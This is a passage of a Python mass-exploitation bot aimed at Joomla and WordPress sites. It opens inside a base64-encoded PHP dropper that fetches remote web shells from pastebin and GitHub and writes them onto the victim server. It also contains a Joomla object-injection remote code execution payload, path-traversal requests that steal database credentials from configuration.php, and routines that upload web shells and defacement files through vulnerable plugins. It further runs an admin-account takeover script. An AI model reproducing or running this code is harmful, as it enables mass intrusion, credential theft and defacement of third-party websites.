3Wlc0eUlEMGdabTl3Wlc0b0pHTm9aV05yTWl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJqSXNJQ1IwWlhoME1pazdEUXBtWTJ4dmMyVW9KRzl3Wlc0eUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXpJcEtYc05DaUFnSUNCbFkyaHZJQ1JqYUdWamF6SXVJand2WW5JK0lqc05DbjFsYkhObElBMEtJQ0JsWTJodklDSnViM1FnWlhocGRITXlJanNOQ21WamFHOGdJbVJ2Ym1VeUlDNWNiaUFpSURzTkNnMEtKR05vWldOck16MGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTkyZFd4dUxtaDBiU0lnT3cwS0pIUmxlSFF6SUQwZ2FIUjBjRjluWlhRb0oyaDBkSEJ6T2k4dmNHRnpkR1ZpYVc0dVkyOXRMM0poZHk4NE9EQjFabUZYUmljcE93MEtKRzl3TXoxbWIzQmxiaWdrWTJobFkyc3pMQ0FuZHljcE93MEtabmR5YVhSbEtDUnZjRE1zSkhSbGVIUXpLVHNOQ21aamJHOXpaU2drYjNBektUc05DZzBLRFFva1kyaGxZMnMyUFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbWgwYlNJZ093MEtKSFJsZUhRMklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d05qMW1iM0JsYmlna1kyaGxZMnMyTENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RZc0pIUmxlSFEyS1RzTkNtWmpiRzl6WlNna2IzQTJLVHNOQ2o4KycpKTsNCmZjbG9zZSgkZnApOw0KJGNoZWNrMiA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2ltYWdlcy92dWxuMi5waHAiIDsNCiRmcDI9Zm9wZW4oIiRjaGVjazIiLCJ3KyIpOw0KZndyaXRlKCRmcDIsYmFzZTY0X2RlY29kZSgnUEQ5d2FIQU5DbVoxYm1OMGFXOXVJR2gwZEhCZloyVjBLQ1IxY213cGV3MEtDU1JwYlNBOUlHTjFjbXhmYVc1cGRDZ2tkWEpzS1RzTkNnbGpkWEpzWDNObGRHOXdkQ2drYVcwc0lFTlZVa3hQVUZSZlVrVlVWVkpPVkZKQlRsTkdSVklzSURFcE93MEtDV04xY214ZmMyVjBiM0IwS0NScGJTd2dRMVZTVEU5UVZGOURUMDVPUlVOVVZFbE5SVTlWVkN3Z01UQXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlHVDB4TVQxZE1UME5CVkVsUFRpd2dNU2s3RFFvSlkzVnliRjl6WlhSdmNIUW9KR2x0TENCRFZWSk1UMUJVWDBoRlFVUkZVaXdnTUNrN0RRb0pjbVYwZFhKdUlHTjFjbXhmWlhobFl5Z2thVzBwT3cwS0NXTjFjbXhmWTJ4dmMyVW9KR2x0S1RzTkNuME5DaVJqYUdWamF5QTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDNSdGNDOTJkV3h1TG5Cb2NDSWdPdzBLSkhSbGVIUWdQU0JvZEhSd1gyZGxkQ2duYUhSMGNITTZMeTl5WVhjdVoybDBhSFZpZFhObGNtTnZiblJsYm5RdVkyOXRMekEwZUM5SlEwY3RRWFYwYjBWNGNHeHZhWFJsY2tKdlZDOXRZWE4wWlhJdlptbHNaWE12ZFhBdWNHaHdKeWs3RFFva2IzQmxiaUE5SUdadmNHVnVLQ1JqYUdWamF5d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaXdnSkhSbGVIUXBPdzBLWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjbUYzTG1kcGRHaDFZblZ6WlhKamIyNTBaVzUwTG1OdmJTOHdOSGd2U1VOSExVRjFkRzlGZUhCc2IybDBaWEpDYjFRdmJXRnpkR1Z5TDJacGJHVnpMM1Z3TG5Cb2NDY3BPdzBLSkc5d1pXNHlJRDBnWm05d1pXNG9KR05vWldOck1pd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaklzSUNSMFpYaDBNaWs3RFFwbVkyeHZjMlVvSkc5d1pXNHlLVHNOQ21sbUtHWnBiR1ZmWlhocGMzUnpLQ1JqYUdWamF6SXBLWHNOQ2lBZ0lDQmxZMmh2SUNSamFHVmphekl1SWp3dlluSStJanNOQ24xbGJITmxJQTBLSUNCbFkyaHZJQ0p1YjNRZ1pYaHBkSE15SWpzTkNtVmphRzhnSW1SdmJtVXlJQzVjYmlBaUlEc05DZzBLSkdOb1pXTnJNejBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRnSWk5MmRXeHVMbWgwYlNJZ093MEtKSFJsZUhReklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d016MW1iM0JsYmlna1kyaGxZMnN6TENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RNc0pIUmxlSFF6S1RzTkNtWmpiRzl6WlNna2IzQXpLVHNOQ2cwS0RRb2tZMmhsWTJzMlBTUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMMmx0WVdkbGN5OTJkV3h1TG1oMGJTSWdPdzBLSkhSbGVIUTJJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQnpPaTh2Y0dGemRHVmlhVzR1WTI5dEwzSmhkeTg0T0RCMVptRlhSaWNwT3cwS0pHOXdOajFtYjNCbGJpZ2tZMmhsWTJzMkxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEWXNKSFJsZUhRMktUc05DbVpqYkc5elpTZ2tiM0EyS1RzTkNqOCsnKSk7DQpmY2xvc2UoJGZwMik7DQo=')")
headers = {
'User-Agent': pl
}
try:
cookies = requests.get('http://' + site, headers=headers, timeout=5).cookies
except:
pass
try:
rr = requests.get('http://' + site + '/', headers=headers, cookies=cookies, timeout=5)
if rr:
requests.get('http://' + site + '/images/vuln2.php', timeout=5)
requests.get('http://' + site + '/tmp/vuln2.php', timeout=5)
ShellCheck = requests.get('http://' + site + '/images/vuln.php', timeout=5)
ShellCheck2 = requests.get('http://' + site + '/tmp/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text:
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write('http://' + site + '/images/vuln.php' + '\n')
IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
IndexCheck2 = requests.get('http://' + site + '/images/vuln.htm', timeout=5)
if 'Vuln!!' in IndexCheck.text:
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write('http://' + site + '/vuln.htm' + '\n')
elif 'Vuln!!' in IndexCheck2.text:
self.Print_Vuln_index(site + '/images/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write('http://' + site + '/images/vuln.htm' + '\n')
elif 'Vuln!!' in ShellCheck2.text:
self.Print_vuln_Shell(site + '/tmp/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write('http://' + site + '/tmp/vuln.php' + '\n')
IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
IndexCheck2 = requests.get('http://' + site + '/images/vuln.htm', timeout=5)
if 'Vuln!!' in IndexCheck.text:
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write('http://' + site + '/vuln.htm' + '\n')
elif 'Vuln!!' in IndexCheck2.text:
self.Print_Vuln_index(site + '/images/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write('http://' + site + '/images/vuln.htm' + '\n')
else:
self.Print_NotVuln('RCE Joomla', site)
else:
self.Print_NotVuln('RCE Joomla', site)
except:
self.Print_NotVuln('RCE Joomla', site)
except:
self.Print_NotVuln('RCE Joomla', site)
def php_str_noquotes(self, data):
try:
encoded = ""
for char in data:
encoded += "chr({0}).".format(ord(char))
return encoded[:-1]
except:
pass
def generate_payload(self, php_payload):
try:
php_payload = "eval({0})".format(php_payload)
terminate = '\xf0\xfd\xfd\xfd';
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
return exploit_template
except:
pass
def Joomla_TakeADmin(self, site):
try:
GetVersion = requests.get('http://' + site + '/language/en-GB/en-GB.xml', timeout=5)
if 'version="3.' in GetVersion.text.encode('utf-8'):
os.system('python files/adminTakeover.py -u MArKAntoni -p MArKAntoni -e ' +
self.EMail + ' http://' + site)
except:
self.Print_NotVuln('Maybe Add Admin 3.x', site)
def Com_s5_media_player(self, site):
try:
Exp = 'http://' + site + \
'/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
GetConfig = requests.get(Exp, timeout=5)
if 'JConfig' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
pass
else:
self.Print_NotVuln('Com_s5_media_player', site)
except:
self.Print_NotVuln('Com_s5_media_player', site)
def Com_Hdflvplayer(self, site):
try:
Exp = 'http://' + site + \
'/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php'
GetConfig = requests.get(Exp, timeout=5)
if 'JConfig' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
pass
else:
self.Print_NotVuln('Com_Hdflvplayer', site)
except:
self.Print_NotVuln('Com_Hdflvplayer', site)
def Com_Joomanager(self, site):
try:
Exp = 'http://' + site + \
'/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php'
GetConfig = requests.get(Exp, timeout=5)
if 'JConfig' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
self.Print_NotVuln('Com_Joomanager', site)
else:
self.Print_NotVuln('Com_Joomanager', site)
except:
self.Print_NotVuln('Com_Joomanager', site)
def Com_Macgallery(self, site):
try:
Exp = 'http://' + site + '/index.php?option=com_macgallery&view=download&albumid=../../configuration.php'
GetConfig = requests.get(Exp, timeout=5)
if 'JConfig' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
self.Print_NotVuln('Com_Macgallery', site)
else:
self.Print_NotVuln('Com_Macgallery', site)
except:
self.Print_NotVuln('Com_Macgallery', site)
def Com_CCkJseblod(self, site):
try:
Exp = 'http://' + site + '/index.php?option=com_cckjseblod&task=download&file=configuration.php'
GetConfig = requests.get(Exp, timeout=5)
if 'JConfig' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[0] + '\n---------------------\n')
except:
self.Print_NotVuln('Com_CCkjseblod', site)
else:
self.Print_NotVuln('Com_CCkjseblod', site)
except:
self.Print_NotVuln('Com_CCkjseblod', site)
def Com_MyBlog(self, site):
try:
fileindex = {'fileToUpload': open(self.Jce_Deface_image, 'rb')}
Exp = 'http://' + site + '/index.php?option=com_myblog&task=ajaxupload'
GoT = requests.post(Exp, files=fileindex, timeout=5)
if 'success' or 'File exists' in GoT.text.encode('utf-8'):
if '/images/pwn' in GoT.text.encode('utf-8'):
IndeXpath = 'http://' + site + '/images/pwn.gif'
else:
try:
GetPAth = re.findall("source: '(.*)'", GoT.text.encode('utf-8'))
IndeXpath = GetPAth[0]
except:
IndeXpath = 'http://' + site + '/images/pwn.gif'
CheckIndex = requests.get(IndeXpath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/images/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndeXpath + '\n')
else:
self.Print_NotVuln('Com_MyBlog', site)
else:
self.Print_NotVuln('Com_MyBlog', site)
except:
self.Print_NotVuln('Com_MyBlog', site)
def Com_Jdownloads_shell(self, site):
try:
fileindex = {'file_upload': (self.ZipJd, open(self.ZipJd, 'rb'), 'multipart/form-data'),
'pic_upload': (self.jdShell, open(self.jdShell, 'rb'), 'multipart/form-data')}
post_data = {
'name': 'ur name',
'mail': 'TTTntsfT@aa.com',
'catlist': '1',
'filetitle': "lolz",
'description': "<p>zot</p>",
'2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
'send': 1,
'senden': "Send file",
'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
'option': "com_jdownloads",
'view': "upload"
}
Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
Got = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
if '/upload_ok.png' in Got.text.encode('utf-8'):
checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + self.jdShell.split('/')[1]
Check = requests.get(checkUrl, timeout=5)
if 'Vuln!!' in Check.text:
ChecksHell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in ChecksHell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_Jdownloads(site)
else:
self.Com_Jdownloads(site)
else:
self.Com_Jdownloads(site)
except:
self.Com_Jdownloads(site)
def Com_Jdownloads(self, site):
try:
fileindex = {'file_upload': (self.ZipJd, open(self.ZipJd, 'rb'),'multipart/form-data'),
'pic_upload': (self.Jce_Deface_image, open(self.Jce_Deface_image, 'rb'), 'multipart/form-data')}
post_data = {
'name': 'ur name',
'mail': 'TTTnstT@aa.com',
'catlist': '1',
'filetitle': "lolz",
'description': "<p>zot</p>",
'2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
'send': 1,
'senden': "Send file",
'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
'option': "com_jdownloads",
'view': "upload"
}
Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
Got = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
if '/upload_ok.png' in Got.text.encode('utf-8'):
checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + self.Jce_Deface_image.split('/')[1]
Check = requests.get(checkUrl, timeout=5)
if 'GIF89a' in Check.text:
self.Print_Vuln_index(site + '/images/jdownloads/screenshots/' +
self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(checkUrl + '\n')
else:
self.Print_NotVuln('Com_Jdownloads', site)
else:
self.Print_NotVuln('Com_Jdownloads', site)
except:
self.Print_NotVuln('Com_Jdownloads', site)
def Com_Fabric(self, site):
try:
fileindex = {'userfile': (self.TextindeX, open(self.TextindeX, 'rb'), 'multipart/form-data')}
post_data = {
"name": "me.php",
"drop_data": "1",
"overwrite": "1",
"field_delimiter": ",",
"text_delimiter": """,
"option": "com_fabrik",
"controller": "import",
"view": "import",
"task": "doimport",
"Itemid": "0",
"tableid": "0"
}
Exp = 'http://' + site + "/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table="
requests.post(Exp, files=fileindex, data=post_data, timeout=5)
Check = requests.get('http://' + site + '/media/' + self.TextindeX.split('/')[1])
if 'Vuln!!' in Check.text:
self.Print_Vuln_index(site + '/media/' + self.TextindeX.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/media/' + self.TextindeX.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_Fabric', site)
except:
self.Print_NotVuln('Com_Fabric', site)
def Com_AdsManager(self, site):
try:
fileindex = {'file': open(self.Jce_Deface_image, 'rb')}
post_data = {"name": self.Jce_Deface_image.split('/')[1]}
Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
if '"jsonrpc"' in GoT.text.encode('utf-8'):
Check = requests.get('http://' + site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1], timeout=5)
if 'GIF89a' in Check.text.encode('utf-8'):
self.Print_Vuln_index(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_AdsManager', site)
except:
self.Print_NotVuln('Com_AdsManager', site)
def Com_AdsManager_Shell(self, site):
try:
fileindex = {'file': open(self.indeX, 'rb')}
post_data = {"name": "vuln.php"}
Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
if '"jsonrpc"' in GoT.text.encode('utf-8'):
requests.post(Exp, files=fileindex, data={"name": "vuln.phP"}, timeout=5)
requests.post(Exp, files=fileindex, data={"name": "vuln.phtml"}, timeout=5)
Check = requests.get('http://' + site + '/tmp/plupload/vuln.php', timeout=5)
Check2 = requests.get('http://' + site + '/tmp/plupload/vuln.phP', timeout=5)
Check3 = requests.get('http://' + site + '/tmp/plupload/vuln.phtml', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
CheckShell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
if 'Vuln!!' in Check.text.encode('utf-8'):
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_AdsManager(site)
elif 'Vuln!!' in Check2.text.encode('utf-8'):
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_AdsManager(site)
elif 'Vuln!!' in Check3.text.encode('utf-8'):
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_AdsManager(site)
else:
self.Com_AdsManager(site)
except:
self.Com_AdsManager(site)
def JCE_shell(self, site):
try:
fileShell = {'Filedata': open(self._shell, 'rb')}
post_data = {'upload-dir': '/', 'upload-overwrite': '0', 'action': 'upload'}
Exp = 'http://' + site +\
'/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
Post = requests.post(Exp, files=fileShell, data=post_data, timeout=5)
OtherMethod = '"text":"' + self._shell.split('/')[1] + '"'
if OtherMethod in Post.text.encode('utf-8'):
PrivMethod = {'json': "{\"fn\":\"folderRename\",\"args\":[\"/" + self._shell.split('/')[1]
+ "\",\"./../../images/vuln.php\"]}"}
try:
privExploit = 'http://' + site + '/index.php?option=com_jce&task=' \
'plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw'
requests.post(privExploit, data=PrivMethod, timeout=5)
try:
VulnCheck = requests.get('http://' + site + '/images/vuln.php', timeout=5)
if 'Vuln!!' in VulnCheck.text:
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
self.Jce_Test(site)
else:
self.Jce_Test(site)
except:
self.Jce_Test(site)
except:
self.Jce_Test(site)
else:
self.Jce_Test(site)
except:
self.Jce_Test(site)
def Jce_Test(self, site):
try:
fileDeface = {'Filedata': open(self.Jce_Deface_image, 'rb')}
post_data = {'upload-dir': '../../', 'upload-overwrite': '0', 'action': 'upload'}
Exp = 'http://' + site +\
'/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
Post = requests.post(Exp, files=fileDeface, data=post_data, timeout=5)
OtherMethod = '"text":"' + self.Jce_Deface_image.split('/')[1] + '"'
if OtherMethod in Post.text.encode('utf-8'):
self.Print_Vuln_index(site + '/' + self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/' + self.Jce_Deface_image.split('/')[1] + '\n')
elif OtherMethod not in Post.text.encode('utf-8'):
post_data2 = {'upload-dir': '../', 'upload-overwrite': '0', 'action': 'upload'}
Post = requests.post(Exp, files=fileDeface, data=post_data2, timeout=5)
if OtherMethod in Post.text.encode('utf-8'):
self.Print_Vuln_index(site + '/images/' + self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/images/' + self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_JCE', site)
else:
self.Print_NotVuln('Com_JCE', site)
except:
self.Print_NotVuln('Com_JCE', site)
def alberghiExploit(self, site):
try:
fileDeface = {'userfile': open(self.Jce_Deface_image, 'rb')}
Exp = 'http://' + site + '/administrator/components/com_alberghi/upload.alberghi.php'
Check = requests.get(Exp, timeout=5)
if 'class="inputbox" name="userfile"' in Check.text.encode('utf-8'):
Post = requests.post(Exp, files=fileDeface, timeout=5)
if 'has been successfully' or 'already exists' in Post.text.encode('utf-8'):
CheckIndex = requests.get(site + '/administrator/components/com_alberghi/' +
self.Jce_Deface_image.split('/')[1], timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/administrator/components/com_alberghi/' +
self.Jce_Deface_image.split('/')[1] + '\n')
self.Print_Vuln_index(site + '/administrator/components/com_alberghi/' +
self.Jce_Deface_image.split('/')[1])
else:
self.Print_NotVuln('com_alberghi', site)
else:
self.Print_NotVuln('com_alberghi', site)
else:
self.Print_NotVuln('com_alberghi', site)
except:
self.Print_NotVuln('com_alberghi', site)
def CateGory_page_icons(self, site):
try:
ChckVln = requests.get('http://' + site + '/wp-content/plugins/category-page-icons/css/menu.css', timeout=5)
if ChckVln.status_code == 200:
Exp = 'http://' + site + '/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php'
fileDeface = {'wpdev-async-upload': open(self.Jce_Deface_image, 'rb')}
PostDAta = {'dir_icons': '../../../',
'submit': 'upload'}
requests.post(Exp, files=fileDeface, data=PostDAta, timeout=5)
CheckIndex = requests.get('http://' + site + '/wp-content/' + self.Jce_Deface_image.split('/')[1], timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/' + self.Jce_Deface_image.split('/')[1] + '\n')
self.Print_Vuln_index(site + '/wp-content/' + self.Jce_Deface_image.split('/')[1])
else:
self.Print_NotVuln('CateGory_page_icons', site)
else:
self.Print_NotVuln('CateGory_page_icons', site)
except:
self.Print_NotVuln('CateGory_page_icons', site)
def Downloads_Manager(self, site):
try:
Checkvuln = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/img/unlock.gif', timeout=5)
if 'GIF89a' in Checkvuln.text.encode('utf-8'):
PostDAta = {'dm_upload': ''}
fileDeface = {'upfile': open(self.Jce_Deface_image, 'rb')}
fileShell = {'upfile': open(self.pagelinesExploitShell, 'rb')}
requests.post('http://' + site, data=PostDAta, files=fileDeface, timeout=5)
CheckIndex = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
self.Jce_Deface_image.split('/')[1])
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
requests.post('http://' + site, data=PostDAta, files=fileShell, timeout=5)
requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
self.pagelinesExploitShell.split('/')[1], timeout=5)
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/plugins/downloads-manager/upload/' +
self.pagelinesExploitShell.split('/')[1])
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
self.pagelinesExploitShell.split('/')[1] + '\n')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_Vuln_index(site + '/wp-content/plugins/downloads-manager/upload/' +
self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Downloads-Manager', site)
else:
self.Print_NotVuln('Downloads-Manager', site)
except:
self.Print_NotVuln('Downloads-Manager', site)
def GetWordpressPostId(self, zzz):
try:
PostId = requests.get('http://' + zzz + '/wp-json/wp/v2/posts/', timeout=5)
wsx = re.findall('"id":(.+?),"date"', PostId.text)
postid = wsx[1].strip()
return postid
except:
pass
